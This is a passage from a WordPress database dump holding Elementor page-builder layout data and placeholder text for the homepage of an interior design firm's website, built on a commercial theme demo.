widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3304,4777,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3305,4777,'_elementor_pro_version','3.8.1'),(3306,4777,'_elementor_css','a:6:{s:4:\"time\";i:1685011836;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3307,4778,'_wp_page_template','elementor_header_footer'),(3308,4778,'_elementor_edit_mode','builder'),(3309,4778,'_elementor_template_type','wp-page'),(3310,4778,'_elementor_version','3.8.1'),(3311,4778,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure 